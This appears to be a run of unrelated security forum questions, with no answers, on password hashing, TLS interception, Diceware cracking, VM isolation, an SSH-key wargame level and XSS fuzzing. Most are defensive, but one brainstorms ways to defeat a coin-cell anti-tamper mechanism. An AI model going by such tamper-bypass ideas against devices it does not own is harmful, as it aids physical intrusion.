Let's say we create a flyer in some desktop publishing software (e.g., InDesign, Illustrator), physically print it and post it somewhere. We don't want inauthentic claims of authorship. Is there a way to, say, put a [?] on the flyer that only we could have generated. Or, that someone claiming to author the flyer cannot prove they generated. (We are fine in revealing ourselves if we have to prove we generated it, it's more to defend against others claiming they did.) Or should it be a message that no-one can decrypt? This might be a simple public key problem, but if someone could list specifics of how we'd do it, it'd be much appreciated!
I've understood that the following steps are taken when I log in to a site: 1. My password is hashed 2. The hash is compared to what's stored in the database. 3. If the hashes are equal, I can log in. I'm also quite certain that if attackers gain access to the password database, they can use brute force to find the clear-text passwords if the hashing algorithm is weak enough. My question is, is there any way for an attacker to bypass step 1 above? I.e. if he/she has gained access to a list of hashed passwords, can the hacker present that hash to the server, thus circumventing the hashing step?
As we all know, when an SSL Certificate is assigned, there is a trust chain that is created for verify everyone from the Certificate Authority to the actual website's SSL Certificate. Thanks to a good discussion with a security expert, I am lead to believe that this trust chain is flawed by the way it is done. After so long in the chain, it seems like you are just blindly trusting everyone that assigns/controls the certificate, even the Certificate Authority. Is this method blind trusting the Certificate Authorities, Root Authorities, and everyone that processes the SSL Certificate? I do see this as a major flaw in the system which we hold dear and use.
It's "time to add a word" says Arnold Reinhold, the creator of Diceware, in his blog (3/2014). He advices to use 6 word sentences (or 5 words with one extra character chosen and placed at random) from now on. Reasons given include that he predicted the likelihood of a change in 2014 back in 1995, and that "Today criminal gangs probably have access to more computing power then the NSA" There is evidence and there are hints (Wikipedia (On the other hand ..) and stackexchange (my comment on Goldberg's answer) that there are (slight?) weaknesses in the Diceware word lists (not in the method). Understanding the he evidence in "Improving the Diceware memorable passphrase generation system" is beyond my math capabilities. I do understand though that the average recovery time of a 4 word sentence can indeed be reduced because ~22 character sentences are the most likely ones. And if the passphrase character count is somehow known, even the exhaustive recovery time may be reduced. However, Arstechnica mentiones 3/2014 (update) an email received from Gosney in which he would have written "Since there are no tools that currently combine three or more words, we don't really know for sure how much slower it would be compared to his 25 GPU monster cracks." Are there really no tools and performance measurements available for cracking 3 word or larger Diceware passphrases? I have tried to find measurements and can only find grammar based proof of principle recovery of phrases. Added in 2 steps after the answers of Thomas Pornin and Arnold Reinhold Arnold Reinhold acknowledges one word list weakness (Diceware words can run together, “act” and “ion” form "action"). Arnold Reinhold: "I now recommend that users of Diceware put a space character between each word, which completely eliminates this problem." Yet, what is a new formula for calculating entropy of a passphrase when spaces are not used?
I am using Firefox browser version 28.0. To access https://www.yahoo.com, I put a proxy with a self-signed certificate in between and my client PC can access the HTTPS site. I then sniffed traffic in my client PC and observed a strange thing; Each HTTPS request sent from Firefox is split into two TCP segments. One is only one character long ("G"), the other includes the rest ("ET / HTTP 1.1 ...") Why does Firefox behave like this?
Is checking the state of the supporting files of the Windows registry hives enough to detect if a new software/malware has been installed on the computer or a given Windows regsitry key has been modified ? By checking the state I mean verifying for example the last modification date, the size of the file and so on. It is something I can do with this Python function, for example. It could be helpful to remember that the supporting files of the Windows registry hives are SAM, security, system, software, default and ntuser. Maybe the best way to ask the question: what is the full ASEP list to survey for any eventual malware (or even legitimate software) installation ?
After reading the question about a manipulated google analytics script I wonder how you would protect against this kind of attack. What comes to mind is setting DNS IP fixed in network configuration or using a tunnel, but in both cases you would not detect the attack. Is there a way to protect yourself and also be able to detect the attack?
I have a client who is looking to hold personal information such as Driving Licences and Insurance documents in order to verify if a user of the site is who they say they are and lives where they say they live (the site is a sort of brokerage) We were looking at storing this information in an offsite solution such as amazon S3, obviously it will be encrypted before it is sent from our server and pulled down and decrypted when we need it but is this enough? Are there extra levels of compliance I need to meet? Forgive me ignorance with this, I'm by no means a security expert and just want to know if this is something we should even be considering.
The internet is full of guides of how to remove malware on already infected computers. Normally, step 1 is to enter failsafe mode, so that the virus can't interfere with the anti-virus program that easy. But if you got infected, you shutdown your computer, then the virus could have time to encrypt itself. And when you later on scan your computer in failsafe mode, the antivirus program can't find the data that the virus encrypted. My question is the following: If a virus did all the things above, would that make it undetectable, or would the AV find the decryption-module, and therefore detect the virus? Thanks in advance!
Could someone please enlighten me, either on a technical level or high level if that detail is not feasible, on how tracker cookies and beacons work. Particularly, how information on my browsing habits (shopping suggestions) can be persisted between different machines even when I only use one for work, never logging into personal accounts. I'm not too concerned with my ISP knowing what I've visited but I resent companies collecting data for targeted advertising. I already use the Ghostery add-on for Chrome. Do I need to start using VPN services? I didn't think companies were able to get information on your internet usage this way anyway. Many thanks everyone.
What is the relationship between the Suite B algorithms and FIPS 140-2 certification? Does OpenSSL meet both criteria? From what I've read, it seems that OpenSSL's crypto library implements many algorithms, and the FIPS 140-2 Object Module covers a subset of those algorithms. Further, it seems that Suite B is an even smaller subset of the FIPS 140-2 certified algorithm list. Is this correct? Am I on the right path? Any clarity would be appreciated. Thanks.
Block http HEAD requests helps us to solidify the safety rules for a Apache webserver or this restriction would be an exaggerated? What kind of vulnerability can be exploited by HEAD method? Tests: lynx --dump --head http://www.terra.com.br HTTP/1.1 200 OK Server: nginx Date: Wed, 16 Jul 2014 14:44:35 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Vary: Accept-Encoding X-Cache-Status: HIT Content-Language: pt-BR X-Ua-Level: Set-Cookie: prisma=WEB-20; path=/; domain=.terra.com.br Set-Cookie: prisma=WEB-20; path=/; domain=.terra.com.br Age: 0 Vary: Accept-Encoding, X-UA-Device, X-prisma X-Device-Type: web X-Xact-Hosts: montador=1sh X-Xact-Uuid: be9ef8c3-163a-40af-8472-0982226424e1 X-Ua-Compatible: IE=Edge Cache-Control: no-cache X-Ua-Device: Lynx/2.8.8rel.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/1.0.1g Set-Cookie: X-XAct-ID=da20bbf3-3a14-4d86-a23b-6fe36f5adae9; Domain=terra.com.br; expires=Wed, 31 Dec 2036 00:00:00 GMT; Path=/ Set-Cookie: novo_portal=1; Domain=terra.com.br; expires=Mon, 01 Sep 2014 00:00:0 0 GMT; Path=/ $ lynx --dump --head http://www.myserver.com.br HTTP/1.1 403 Forbidden Date: Wed, 16 Jul 2014 14:44:44 GMT Server: Apache Last-Modified: Tue, 01 Apr 2014 05:28:27 GMT Accept-Ranges: bytes Content-Length: 4874 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html UPDATED: The answer of the GET method is also applicable to TRACE, DELETE OR TRACK methods? Apache conf: RewriteCond %{REQUEST_METHOD} ^(TRACE|DELETE|TRACK) [NC] RewriteRule .? - [F]
I have come across a few Android apps that provide various features for communicating with a desktop machine (sending text or typing in one direction or another, controlling the desktop pointer with the mobile device, sending mobile notifications to the desktop, etc). Most of them rely on both machines being on the same network, running a small server application on the desktop, which opens a port for communication (or the other way round if you're controlling the mobile device from the desktop). Generally they have no provisions for authentication. The obvious security flaws are: No authentication. Anyone else can easily hop onto the open device/desktop via the open port and control it just as you can. No encryption. Anyone can read the stream between the two computers. Most of the open source apps are up-front about this, an simply advise that you only use them on a trusted network. Some also offer USB access via adb. I am looking for apps that do not have these flaws (or, potentially, suggesting a new mechanism to an existing app). What existing mechanisms are there for communicating over-the-air between an Android device and an Ubuntu desktop? Bluetooth? (If the mechanism is generalisable to other platforms, that's also great. If it's more theoretical - like a protocol that needs to be implemented on Android - that's valid too, as there are people doing things like implementing mosh for Android.)
I am running a Windows XP virtual machine on a Windows XP host machine. I use the VM for suspicious websites and software/applications. In the case a kaylogger will be installed on my VM: will this keylogger listen to the keyboard activities when I type on the host machine ?
I was wondering how PGP works with a CC. In my understanding, if I send an e-mail to foo@example.com and use baz@example.org in the CC, Enigmail would have to encrypt the e-mail once for every user and send two e-mails. But in reality, if baz@example.org checks his e-mail he is still listed as CC and not as the main recipient (which would be the case if the e-mail were encrypted once for everyone). So how exactly does it work?
What's the best way to hash a credit card number so that it can be used for fingerprinting (i.e. so that comparing two hashes will let you know if the card numbers match or not)? Ideally, I'm looking for recommendations of which hash + salt might be well suited for this use-case. The hash would uniquely identify a particular card number. You can use this attribute to check whether two customers who've signed up with you are using the same card number, for example. (since you wouldn't have access to the card numbers in plain text) To give this some context, see the Stripe API docs and search for fingerprint. It's where I first heard about this concept. The credit card information will be stored on a secure machine (somewhere in the Stripe back-end) that's not accessible by the customer, and the API returns the fingerprint in order to allow the API consumer to make comparisons (e.g. to answer questions like has this card been used before?). Let's make this one clear, coz I know you're going to ask: I'm not trying to replicate it. I'm just curious to understand how this could be implemented
I have found a small encryption in a programm and would like to identify it, in terms of the public name. I have been programming with a DES and with TEA, but what i have here is not even similar with these. The Algorithm is en/encrypting (exactly, only) 4 byte blocks, is using 5 steps left and right shifting, and xoring. All calculations are crosswise combinations of the above, no replacing "s-boxes" are involved. I see a "seed" ? of 8 bytes , there is another 4 byte block involved, all encryption ends up in a 4 byte block for a 4 byte start. The encryptio. is done by executing 20 identical rounds with no other modification involved. I would like to identify the algorithm to make my mind up about the security of this codepiece. It isnt very high anyway because of the small blocksize, which allows a brute force plaintext attack, but i am just interested about the background of this. If i had a closer find to all the available principle algorithm procedures, I would try to find the final match by myself, but as far as i looked into others i was lost by my missing general knowledge. Update: I saw the answered question of a base64-lookings string (no information there was helpful for me) but i have a different case here. I do not want to identify an encryption by the output string format, i want to identify it by parameters (functionalities used) of the algorithm i see in the code. I have added some more info in the desription of the parameters i found. I am sure it is encryption (no hash) because its working both ways. Thanks again for any support.
When a user is logged into a web-based application in multiple tabs, and changes their password, should it automatically log them out of the other tabs? The use case is an account is compromised, the attacker logs in, the user also logs in and changes their password, however, since the attacker was already logged in, they are still granted access until they log out. This seems to require storing the password bcrypt hash in session, and then every request check the session bcrypt hash against the bcrypt hash in the database. Is there an alternative approach?
I am running a windows 7 virtual box without internet connected. Internet is, however, connected to the host, and I allow any internet access to and from the host. On the guest platform I am working with some sensitive documents that I do not want any viruses or attackers to get. Can someone look at the virtual box hard-drive stored in my host machine, and extract the information from the files there? If so, how can this be completely prevented. I am a Python programmer with massive experience in algorithms (no internet experience or networking), so I was wondering If I could create a program to block all internet access to a given file. This program would be able to completely deny EVERYTHING from the host that tries to access it; programs, internet, anything. I am not sure if that can be done though. Any suggestions would be greatly appreciated! In order to clarify the questions: How safe is virtual box when not connected to the internet? Can a listing of all internet access at a given time be obtained? How can everything be prevented from accessing the virtual box hard-drive, or anything related, where important data can be stored? If anyone knows any Python related security, how can this be implemented if at all? P.S. I don't want a solution that encrypts the virtual hard drive so a point where I cannot use it. I want internet and foreign program access blocked, but still be able to use the guest virtual box machine from the host. Simply no outside access.
I could use a password manager, but I don't like relying on another entity than myself to store my passwords, and it would screw me over if I find myself on the internet in a new location without the database. So I want to use the correct horse battery staple method for my passwords (don't tell anyone,) and memorise all of them. But I'm not sure how I can remember which password is for which service. How can I mnemonically link each password to the particular service?
Found this article on using Live Boot Devices to do sensitive tasks such as online banking. While the article discusses the benefits of avoiding a possibly compromised host OS, it doesn't mention lower-level threats. Given increasing prevalence of sub-OS malware (e.g. BIOS, NIC, etc.), is there still a substantial increase in security from using Live Boot Devices? My understanding of the issue is that regardless of the OS you're booting to, compromised hardware has the potential to log and exfiltrate your activities. While the susceptibility of your personal machine may be less than public hardware (for instance, a hotel terminal), the security gained from a Live CD seems to be marginal. Basically: Are Live Boot Devices worth the bother? Is BIOS malware as common/dangerous as I have heard?
I'm looking to generate some new passwords for myself that are easy to remember, but hard to crack. By choosing a generation algorithm and generating one random password with it, I can be relatively confident of how hard to crack my password is. (I can calculate its entropy.) If, instead, I keep generating passwords until I see one I like, the security of my password is (significantly?) less. Worse, because I can't analyze my own mind like I could analyze an algorithm, I don't even know how insecure my password might be. It should be better (in terms of security) to control myself and say, before the password is generated, "whatever password is generated is the one I will use". But it might not be as easy a password to remember as "correct horse battery staple". It's hard to predict what will be easy/hard to memorize, and it can vary a lot from person to person. What about a happy medium, where I decide that I will generate exactly N (for example, 10) random passwords, and choose one of them? Would this be any worse than "1/N times" secure?
So I have a client-authencation cert installed on client PCs, which doesn't expire for 5 more years. Unfortunately, the cert on our gateway which is used to validate the client cert, expires this month. I know.... D'Oh! Plan A is to place a new cert on our gateway, and issue new client-auth certs to all of the clients. This is going to be very disruptive. It seems like it would be simpler to place a new cert on our gateway, and have it continue to validate the client certs until the client certs actually expire in 2019. This would be my proposed "Plan B". Is Plan B valid? i.e. can you have a new cert on the gateway, honoring existing certs, or do you have to re-generate everything "top-down"? I guess I'm asking if you can replace a link in the trust chain, without breaking the chain. I'm sorry that this is over-simplified. I don't really understand all of this, but am struggling to find a loophole here that we can leverage. These certs are generated internally (our own CA) and are not used for SSL. Only client-auth, attached to SOAP messages, within SSL (SSL isn't expected to change). Thanks, Chris
For a cryptocurrency client implementation, I am serving a single page webapp to mobile clients. It is a client-side-only page. I would like to serve this page to clients, but I fear tampering by hosts to change the code so that user passwords are intercepted. The passwords, at least 128 bits of entropy enforced, are cryptocurrency signing key seeds. Unfortunately, and this may be erroneous, it seems that mobile browsers cannot open and run local html files, or if they can, they cannot run css or js files. I'm aware of apps that allow this, but I'd prefer that to be a last resort so to reach the least savvy. Is the only option to physically manage a server myself to achieve the desired convenience?
I have two different crypto libraries I created, one is in java and uses the standard built-in java crypto libraries. The other uses openssl and has been wrapped in java through the JNI. I'm currently replacing the default java library code with the openssl library code, and verifying the encryptions against each other to make sure nothing breaks for my end user. I'm curious, because java is only guaranteed to support 128 bit keys using its implementation of PBKDF2, so I'm using AES CBC 128 with java. I had originally coded for AES CBC 256 in openssl, not thinking. What I'm curious about is this: When I input a 256 bit key into java's AES CBC 128, I got the same output as I did for openssl's AES CBC 256. When I input a 128 bit key into AES CBC 128, I got a different output than when I input the same key into openssl's AES CBC 256. (I used the same 16 byte IV across all trials) I assume the two different encryption schemes would generate completely different results, so I'm confused as to why this is happening. I thought I had a better understanding of the cipher than it appears I actually do. Apologies if this is a painfully obvious result, I'm still somewhat new to crypto.
If a user connects to an SSH server using an rsa private key, but does not confirm the server's fingerprint. What kind of information can a man in the middle attack get from the session?
My GF just told me she just sent some of her personal info over an email. She was trying to send her folks some documents. I guess the documents had some sensitive info on them, like her full name, SSN#, etc. The email was not encrypted. How at risk is she and what should she do from here? She is freaking out.
I'm currently following a small game to get more familar with linux and security and got the following task: The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. \ Note: localhost is a hostname that refers to the machine you are working on For now I'm logged in with the user bandit13 in the machine where user bandit14 exists and got the private key. When executing the ssh -i command on the machine (as logged in user bandit13) I get access to the bandit14 profile: ssh bandit14@server.org -i privatekeyfile Now what bothers me is, can one log into your user account by just using the given SSH private key from any remote client? I tried to log in using my system but however, the server refused my key. I tried with PuTTY on windows and with the terminal on Mac OS X (with the same command). From what I know is, that the associated public key needs to be put into the authorized_keys file at the server (i.e. the machine that get's accessed). But why does logging in from the remote machine not work but from the local one? Note: The public key is unknown, I got no access to the authorized_keys file on the server.
I'm trying to understand SSL/TLS. What follows are a description of a scenario and a few assumptions which I hope you can confirm or refute. Question How can my employer be a man-in-the-middle when I connect to Gmail? Can he at all? That is: is it possible for the employer to unencrypt the connection between the browser on my work computer and the employer's web proxy server, read the data in plain text for instance for virus scans, re-encrypt the data and to send it to Google without me noticing it? Browser on employee's computer <--> employer's web proxy server <--> Gmail server The employer can install any self-signed certificate on the company computers. It's his infrastructure after all. Scenario: what I am doing With a browser, open http://www.gmail.com (notice http, not https) I get redirected to the Google login page: https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/&ss=1&scc=1&ltmpl=default&ltmplcache=2&emr=1 I enter my username and password I get redirected to Gmail: https://mail.google.com/mail/u/0/?pli=1#inbox I click on the SSL lock-icon in the browser... ...and see the following: Issued to: mail.google.com Issued by: "employer company name" Valid from: 01.01.2014 - 31.12.2014 Certification path: "employer company name" --> "employer web proxy server name" --> mail.google.com Assumption I'm now assuming that the SSL lock-icon in the browser turns green, but in fact I don't have a secure connection from the browser to the Gmail server. Is that correct? Sources I've read these sources but still don't quite understand it: Is there a method to detect an active man-in-the-middle? Preventing a spoofing man in the middle attack? How does SSL/TLS work? Summary Is it possible for someone to be a man-in-the-middle if that someone controls the IT infrastructure? If so, how exactly? Is my login and password read in plain text on the employer's web proxy server? What should I check in the browser to verify that I have a secure connection from the browser all the way to the Gmail server? EDIT, 18.07.2014 Privacy is not a concern. I'm just curious about how TLS works in this particular scenario. What other means the employer has to intercept communication (keylogger etc.) are not relevant in this particular case. Legal matters aren't a concern. Employees are allowed to use company IT equipment for private communication within certain limits. On the other hand, the employer reserves the right to do monitoring without violating privacy.
How could I decrypt a file (encrypted with AES-128) using openssl ? I do not remember the passphrase I used to encrypt it, but I saved the key generated and used to encrypt my file. How could I use this key to decrypt my file ?
I am connected to my chat accounts via Empathy, a messaging program, and it has my password stored in it. I am really curious to know how it is storing the passwords, and if there is any they can retrieved back in plain text?
If you have a REST API, which when you log in from the client side, generates an access token for the client, which is then stored in local storage and used for all authentication from this point on. Is it secure to keep using the same access token, say you generate the access token, store it in the database, and keep using this access token till the client actively presses log out? If no, what would be the requirements to make this secure?
I'm unable to understand how arbitrary code execution vulnerabilities are supposed to work. Wikipedia mentions: Arbitrary code execution is commonly achieved through control over the instruction pointer of a running process. Say, the vulnerability is being triggered by some maliciously crafted file that said process is reading. How could it modify the instruction pointer, or, otherwise, corrupt the internal state of the application so as to cause it to execute the attacker's code? Also, given that modern OSes implement DEP and ASLR, how is this even feasible? The data loaded from the application would not even be executable, and additionally, it's also difficult to determine the offset of the shellcode/payload. Brownie points for showing a small snippet of code that would be vulnerable to such an exploit.
The traffic from Wireshark saved into a file with dumpcap. In this file a have for example : € X `þ $À6 @ íëÃNxXÀ¨£ P&E»kKí¨<`PEà; HTTP/1.1 200 OK Cache-Control: private And I want to see only : HTTP/1.1 200 OK Cache-Control: private On windows 7 and I use this commands : cd\pro* cd wires* tshark -D dumpcap -i 5 -s 96-w packets.cap
is it recommended to use both protocols together? In which situation?
We are currently using EasyRSA and OpenSSL to manage our user VPN certificates for OpenVPN. The process we have in place currently is: User generates a CSR on their laptop and sends it to us to sign We copy the CSR to the server, sign it, and return the signed CRT to the user We usually leave a copy of of the CSR and CRT on the server When a user's cert is revoked, we store this information in a CRL I'm tasked with auditing who has access to the VPN. As far as I can tell, the only way we can check who has access is by listing all of the CRTs on the server, and subtracting the revoked CRTs as listed in the CRL. However, this strikes me as not at all sound, as if anyone deleted a CRT and CSR from the server, we would have no way of knowing that it had ever been signed. Is the current method trustworthy? If not, is there any way to know exactly which certs that were signed are still valid?
What's the point of spotlighting wget on heartbleed dumps? I'm specifically talking about this which is the first page of wget occurencies in heartbleed dumps. They put this page as a link on the top of the main page like if that is relevant in some way. I can understand the reason behind exposing email= and password= and bitcoin and so on, but what about wget? Is it because it might reveal system paths or potential RCIs, or is it because it exposes a system with heartbleed and thus wget - which is shown to be used - is also vulnerable to it?
I just visited a forum and a member knew what OS I was running without me saying anything (a not TOO common distro of linux). Now I'm not sure how he exactly he might have done it, or what information he might have been able to get out, but, for starters, I'm guessing that, besides information on my OS, they might have been able to determine other things such as my ip address, general location, browser, and even browser cookies. Whether or not it was necessary, I deleted my browser, performed a scan with both chkrootkit and rkhunter, and will never get back on that site. Heck, I'm wondering if by posting here so soon after, I'm putting myself at risk. I guess the questions burning in my mind are: can they pose a threat to others in my network assuming there is a firewall and wpa2 security type? I don't have any real important information in my system, and I don't really do anything that might really put me at real risk besides the odd online purchase, but I don't know what others might have in their systems. Should I be able to keep doing those normally until I see something weird? Besides what I already mentioned, what other steps should someone in this situation take?
So, a bit of context before I start may be handy. I am developing a Java desktop application which will use an SQLite database to store/process data. The application will utilize authentication to access the program for editing data, adding/deleting data, etc. But I don't want an attacker to be able to pull the laptop's hard drive and access the data without first authenticating to Windows. My question is, if I were to encrypt certain data before inserting into the SQLite database with say...AES256, is it possible to decrypt the data without the user having to insert a password AND without hardcoding the password in the application? I really think the overhead of the user having to remember 2 passwords (one for application authentication and one for database encryption/decryption) is infeasable because if they forget the encryption/decryption password, their data is gone.. Have any of you come across any solutions that you can share or suggest some ideas that may be of help?
A framework for modeling password management risks and costs, and the beginnings of a good strategy for users to help them manage passwords for their often large portfolios of accounts is outlined in the paper Password Portfolios and the Finite-Effort User: Sustainably Managing Large Numbers of Accounts | USENIX Security 2014 (note the full pdf text is already available). It is covered e.g. at Mathematics makes strong case that “snoopy2” can be just fine as a password | Ars Technica Microsoft researchers: Re-use the same password across sites likely to be hacked | Network World Basically, since it is impossible for users to remember good, unique passwords for dozens or hundreds of different accounts, and since some accounts have low risks to the user if they are compromised (e.g. passwords to log in to a newspaper site to read stories), they explain that "password re-use can be part of a coping strategy". They suggest that people can group together accounts with high value plus low probability of compromise, and those with low value plus high compromise probability, and reuse the same password within each group. Their analysis covers password managers, which shift some of the risks around, to some degree also. On that topic see also How to evaluate a password manager?. I'll add that hybrid strategies can also make sense, e.g. using a password manager for some groups of accounts. They note the need to understand and explain how users can trade off user effort at remembering passwords with the probability that the password is compromised. This site has gathered some wisdom relative to that: What is your way to create good passwords that can actually be remembered? They also note the need for future study to understand, model and explain the losses due to compromises of various types of accounts. So my question for the risk-management experts and those adept at explaining things in ways that connect with users is, how can we best help users understand the kinds of risks they face if accounts of various types are compromised? E.g. compromise of a password for an online bitcoin wallet presumably means the unrecoverable loss of all the bitcoins stored there. But compromise of the password for reading articles on a newspaper site may have little or no meaningful impact on the user, and in fact some groups of users try to share accounts and passwords for these sorts of sites with their friends. Other kinds of accounts are traditional banks (with some hope of recovery of stolen funds), social media, email, work-related passwords, web services, wifi access, encryption keys, etc. Sometimes the losses may not be obvious to the users (e.g. risks of identity theft, reputation loss, etc).
I want to have a simple application that is in .exe (executable) format hosted on a secure domain that, on my website, a user can click to download and run. However, I'm aware that many annoying viruses are in the form of a harmless-looking executable, so I naturally would want to also put, as a small notice for that download, something like "Not a virus - trust me at your own will". But this leads me to a certain concern. How, if possible, could that executable become infected? Is what I'm thinking of doing stupid? If so, what is a better alternative? What precautions should I take? The last thing I want is for a file of mine to become infectiously corrupted and to have the possibility of it messing with others (though Linux users are more or less safe).
Soon I will be acquiring the event logs of the systems my company produces and expected to audit them. Multiple logs are generated from each computer and there are multiple operating systems to audit. The systems are isolated from the internet and have a significant amount of physical security, not to mention there isn't a whole lot of conventionally useful data to obtain from them anyway. Am I wrong to feel it is unreasonable and unproductive to be examining these logs? I am under the impression that any potentially malicious activity isn't necessarily going to be obvious just by looking at the logs, if it can even be detected at all. Since it seems I can be on the hook if an unreported incident was discovered, how can I possibly analyze the overwhelming amount of information headed my way without changing my job title to 'Event Log Reader'? Does software exist that can help?
I bought a domain few days before. but it came to my attention that my domain has been blacklisted by many antivirus programs and search engines as the domain for previously purchased by somebody and he misuse it. Though i have asked few antivirus companies and search engines to review the domain, but i want to know what else i should do to get this thing fixed. Also what type of security certificate should i buy and from where? please tell me the process in detail for buying a security certificate and best ways to get my domain name removed from blacklisted list.
I was looking through the OpenSSL vulnerabilities list and came across CVE-2010-5298 as a 2014 vulnerability. At http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298, under Date Entry Created, it says 20140414. However, under http://cve.mitre.org/cve/identifiers/syntaxchange.html, it clearly shows that format as CVE-YYYY-NNNN: The CVE-ID Syntax Change took effect on January 1, 2014. New CVE-ID Syntax The new CVE-ID syntax is variable length and includes: CVE prefix + Year + Arbitrary Digits IMPORTANT: The variable length arbitrary digits will begin at four (4) fixed digits and expand with arbitrary digits only when needed in a calendar year, for example, CVE-YYYY-NNNN and if needed CVE-YYYY-NNNNN, CVE-YYYY-NNNNNNN, and so on. This also means there will be no changes needed to previously assigned CVE-IDs, which all include 4 digits. I thought the year is always reflected in the CVE code. What happened in this case? Is this a common occurance?
I'm new to SSL/TSL and was wondering if you could walk me through the following scenario. Scenario Let's say I am one of a thousand websites that has a certificate signed by some certificate authority (CA). Everything is fine. Breach Then, some evil hacker steals the CA's private key. Now, all of a sudden, all thousand website's certificates are untrustworthy because the hacker can issue certificates signed with the stolen private key and one can't distinguish between real and fake certificates anymore. The CA revokes his stolen certificate, so I end up with a website that no browser recognizes as trustworthy anymore. Mitigation What do I do now? I've read these questions: What can an attacker do with a stolen SSL private key? What should the web admin do?. What happens when an Intermediate CA is revoked? Now, I got to run and get a new certificate signed by a still trusted CA. Question Therefore, I was wondering: what should I have done in advance so that once the CA's private key is stolen, I don't have to run, but can lean back and don't have to worry about it? Should I have a second certificate ready which was signed by another CA which I can deploy once the other one gets untrustworthy? Can my old certificate be simultaneously signed by a second CA so that it stays valid even if one CA's private key is compromised? What mitigation scenarios are there? Real cases The question came up after reading these cases: Microsoft revokes trust in certificate authority operated by the Indian government DigiNotar Comodo Group Issues Bogus SSL Certificates
Homework question The full question is the following: Suppose you are told that the one time pad encryption of the message "attack at dawn" is 09e1c5f70a65ac519458e7e53f36 (the plaintext letters are encoded as 8-bit ASCII and the given ciphertext is written in hex). What would be the one time pad encryption of the message "attack at dusk" under the same OTP key? To me it seems that all you'd have to do is find what the hexadecimal representation of attack at dusk is, add that to attack at dawn message and then use the key to convert attack at dusk to an encrypted value. However, I don't know how to store the hexadecimal value in C++ (or any language for that matter). This is what I thought you would do: string attackAtDawn = 61747461636b206174206461776e;
First of all, I apologize if these questions can be answered using a web search, but I'm sort of a crypto noob and don't know what to search for. Given N AES encrypted messages (where the message length is much longer than the key length), and the corresponding N decrypted messages (all encrypted with different keys), is it possible to pair up each encrypted message with its decrypted counterpart? Given one AES encrypted message and its decrypted counterpart, is it possible to reconstruct the key used for encryption if you know the key is 256 bits? If AES cannot achieve these ends, is there a more suitable symmetric encryption algorithm that can? Edit: I did some research and found the answer to #2. This type of attack is known as a plaintext attack, and AES is not known to be susceptible to this type of attack.
Ok I've worked with some penetration testing but it's all done in house where I work at on a secure network to secure servers and work stations before being deployed. But my question here is kind of vague on the laws of the U.S. I want to show my girlfriends son who is interested in my line of work some examples of hacking, but I can not bring him to where I work because they live two hours away from me. So my question here is, would it be illegal for me to set up one of my personal servers or computers on my home network and then actually hack into it from her house with in the same state? I would be using all my personally owned equipment (ie. laptop, server, desktop PC, routers and cable modems) only thing I wouldn't own is the internet itself, that is owned and controlled by bright house networks.
Utill yesterday I never saw any warnings on secure sites like twitter and many others but currently I am getting an exclamation in my chrome saying identity not verified but https is indeed used, hence what to do in this situation? following are the screenshots: Well it was resolved today
Note: This is not an actual situation I'm currently in. Assume your boss is one of those old-fashioned computer-illiterate managers and wants to store the passwords in plaintext to simplify development. You get 5 minutes to explain the point of hashing passwords. You also know from experience that your boss can be swayed by a good analogy. What analogy would you use to explain your boss that passwords should be hashed?
I'm not clearly understand technologies behind OpenVPN, so I have a question about OpenVPN security: What if I have client.p12 (PKCS#12) file and this file was leaked (with export password) to some evil person. Additionally this person can dump my encrypted VPN traffic (which was secured with leaked client.p12 file). Does this means that dumps of my traffic can be decrypted or hacked with MITM? Or it's not possible due the fact that server key wasn't compromised and this evil person can only authorize on server as me?
From http://msdn.microsoft.com/en-us/library/jj709705.aspx In contrast to the DAC model, which is oriented around objects, the AzMan RBAC model attempts to orient the common administrative experience around user roles. Rather than assigning permissions to objects, an AzMan RBAC framework enables applications to present administrators with a management experience more aligned with the organizational structure of a company. AzMan RBAC provides a central object—a role—that a user is assigned to perform a particular job or application function. Ideally, an RBAC application is designed such that the administrator requires less knowledge of the object storage structure. This approach can be used if the RBAC application provides a simplifying abstraction into resource collections referred to as scopes. Can someone please explain to me how this is any different at all from user/group ACLs? e.g. Say I want managers to have read access to /mnt/network_performance_reports, sysadmins to have full read/write access, and everyone else to have no access. I would think that (on Linux with POSIX ACLs, I don't really know Windows) I could set a default ACL on /mnt so everything under it is effectively chmod 0700 (directories) or 0600 (files). create a sysadmins group and set up a read/write default ACL for sysadmins create a managers group and set up a read-only default ACL for managers That's not exactly easy to manage (not centralized, blech!) but it does the same thing, doesn't it? I don't think I'm quite understanding the concept. When people talk about RBAC in operating systems, are they effectively talking about a layer of abstraction on top of MAC/DAC systems to make management of those easier for large organizations? Or are they talking about something that is different internally; i.e. is associated with completely different methods and data structures in the the OS kernel?
What is the difference between openssl and mkcert. Which one should I prefer. I want to create an IIS hosted WCF service. Which one should I use to create an SSL certificate. Also, there is another option to create an ssl certificate. On the iis we can create a self signed certificate. Can I use this instead of the one created by mkcert or openssl
An anti tampering mechanism of a device relay on detect tampering mechanism when the device is powered down using the energy provided internally by a coin cell. Is there a way to uncharge rapidly a coin cell contained in a device without having access to the coin cell and the electronic that use it ? I'm trying to thinking out of the box (probably in a stupid way). What about ? microwave effect high/low temperature increase/decrease humidity ?-ray from a medical equipment
I am looking to PEN test my application against XSS attacks. The application is a REST API... As such when you POST some JSON to /cart/add to see the result of that attack you would need to GET /cart. So far I have figured out how to successfully use Fuzzer to make XSS attacks to my application. However it expects the response to contain the data it just submitted. I guess what I need is a two step approach to Fuzzer. Make attack request to POST /cart/add Assert if attack was successful by requesting GET /cart Does anyone know how I can do this?
The requirements for a system like itunes store or google play are as follows; identify and authenticate the user determine if the user has paid for a given app if s/he has, securely transmit the app and install it on the device What is the strategy used in this situation? In particular, is the app transmitted in an encrypted format or in plaintext?
Years ago computer security analysts Dan Farmer and Wietse Venema wrote the security program S.A.T.A.N. Does anyone know what happened to it (or if it just went out of style) and what people replaced it with, if anything?
